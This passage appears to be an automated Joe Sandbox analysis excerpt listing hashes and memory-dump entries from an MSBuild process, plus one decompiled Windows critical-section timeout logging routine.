                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c741ca1c946640c66ddc9c769b106e5857d3f5d728a0cec31fd1fc5f5801b016
                                            • Instruction ID: 61b28a2f23d639a8ad055584e078c041f1f8906755cf423995d6121b1812e63b
                                            • Opcode Fuzzy Hash: c741ca1c946640c66ddc9c769b106e5857d3f5d728a0cec31fd1fc5f5801b016
                                            • Instruction Fuzzy Hash: 9490026160500903D281719994187070519E7D0241F51D012A4414554DC6998A9577E1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 65bb4e1ff23387edfce8ddd031c06bf451271677ffdffc67673cb40e4f17d67e
                                            • Instruction ID: 2818842ec1f084e48fab7a1517d4359d569304a67161cf214a9427c06e3f5b0e
                                            • Opcode Fuzzy Hash: 65bb4e1ff23387edfce8ddd031c06bf451271677ffdffc67673cb40e4f17d67e
                                            • Instruction Fuzzy Hash: AF90027120100903D241619995087070509E7D0241F51D412A4814558DD69688917261
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 77f4bed0fb81eb983dceebdefc18bc16ef2f486dcf39a1a1fb59858803bafec0
                                            • Instruction ID: 1dd37c320deed9d9fcb49989d5f03adc1d022e29425018835df9669ee5e7c10e
                                            • Opcode Fuzzy Hash: 77f4bed0fb81eb983dceebdefc18bc16ef2f486dcf39a1a1fb59858803bafec0
                                            • Instruction Fuzzy Hash: 8B90026120504943D24165999408A070509E7D0245F51D012A5454595DC6758891B271
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 020fbcaebce92df020ce2677bdbdc58cb6f42a5692752bbb52bbe7eff4c04f71
                                            • Instruction ID: a6199c5b91a91cdff5a4a5f0734b2fb0f709551831361026fcd8f7bd9636feb4
                                            • Opcode Fuzzy Hash: 020fbcaebce92df020ce2677bdbdc58cb6f42a5692752bbb52bbe7eff4c04f71
                                            • Instruction Fuzzy Hash: 1090027520504943D64165999804A870509E7D0345F51D412A481459CDC69488A1B261
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c70a07d5ebf9807f1d5811a279b5d300af5e73d5514127961a8cafa4118062ca
                                            • Instruction ID: a4fb486695c3a6bee6c404fde70784a1d4f9d8efd06ce8b735cac5b375cb5da4
                                            • Opcode Fuzzy Hash: c70a07d5ebf9807f1d5811a279b5d300af5e73d5514127961a8cafa4118062ca
                                            • Instruction Fuzzy Hash: 7890027131114903D2516199C4047070509E7D1241F51C412A4C14558DC6D588D17262
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8785a847c1d0145c8622b27e3c9d557312093b25251b47cc522461516523fa5f
                                            • Instruction ID: e4aea860aa60096efcade86a40f78e2bcfcc5716973814f0f3b17ac8ef23ea61
                                            • Opcode Fuzzy Hash: 8785a847c1d0145c8622b27e3c9d557312093b25251b47cc522461516523fa5f
                                            • Instruction Fuzzy Hash: 4B90027160500D03D291719984147470509E7D0341F51C012A4414654DC7958A9577E1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: cdbcf6775d5212dfafe1a2aca233aa9808f51c7a634d69a09dba7785bd777ca8
                                            • Instruction ID: 7c2ca12acb9b0c7534544207ccf8a949df65f546727e30b0f6e9b3cb3db940dd
                                            • Opcode Fuzzy Hash: cdbcf6775d5212dfafe1a2aca233aa9808f51c7a634d69a09dba7785bd777ca8
                                            • Instruction Fuzzy Hash: E490027120504D43D28171998404A470519E7D0345F51C012A4454694DD6658D95B7A1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d084e34f45e71186e7bf24a3a42ff74b9961cf7b4932665b62f95a31713448a3
                                            • Instruction ID: e4bd8265b687f7542c482179e1b506887ec970ef1594add6a3af5b6d27e7e8a0
                                            • Opcode Fuzzy Hash: d084e34f45e71186e7bf24a3a42ff74b9961cf7b4932665b62f95a31713448a3
                                            • Instruction Fuzzy Hash: 0490027120100D43D24161998404B470509E7E0341F51C017A4514654DC655C8917661
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                            • Instruction ID: 9d5597053641f5cc6d239f94d630d68a398ad9bd2844e46bd555a21cdaae2db9
                                            • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                            • Instruction Fuzzy Hash:
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 53%
                                            			E0109FDDA(intOrPtr* __edx, intOrPtr _a4) {
                                            				void* _t7;
                                            				intOrPtr _t9;
                                            				intOrPtr _t10;
                                            				intOrPtr* _t12;
                                            				intOrPtr* _t13;
                                            				intOrPtr _t14;
                                            				intOrPtr* _t15;
                                            
                                            				_t13 = __edx;
                                            				_push(_a4);
                                            				_t14 =  *[fs:0x18];
                                            				_t15 = _t12;
                                            				_t7 = E0104CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                                            				_push(_t13);
                                            				E01095720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                                            				_t9 =  *_t15;
                                            				if(_t9 == 0xffffffff) {
                                            					_t10 = 0;
                                            				} else {
                                            					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                                            				}
                                            				_push(_t10);
                                            				_push(_t15);
                                            				_push( *((intOrPtr*)(_t15 + 0xc)));
                                            				_push( *((intOrPtr*)(_t14 + 0x24)));
                                            				return E01095720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                                            			}











                                            APIs
                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0109FDFA
                                            Strings
                                            • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0109FE2B
                                            • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0109FE01
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                            • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                            • API String ID: 885266447-3903918235
                                            • Opcode ID: 3ba79f0c5f1728df81815a6c1b397b25423e7d3c6b66494d2204e60f48f32a5c
                                            • Instruction ID: e245201ac683d6661fce4592fb1fe9eaf822f8a42b76a9a5a807242b8ac001f7
                                            • Opcode Fuzzy Hash: 3ba79f0c5f1728df81815a6c1b397b25423e7d3c6b66494d2204e60f48f32a5c
                                            • Instruction Fuzzy Hash: 83F0F672240202BFEB211A46DC06F77BF5AEB44B30F140315F768961E1DA62F920A7F1
                                            Uniqueness

                                            Uniqueness Score: -1.00%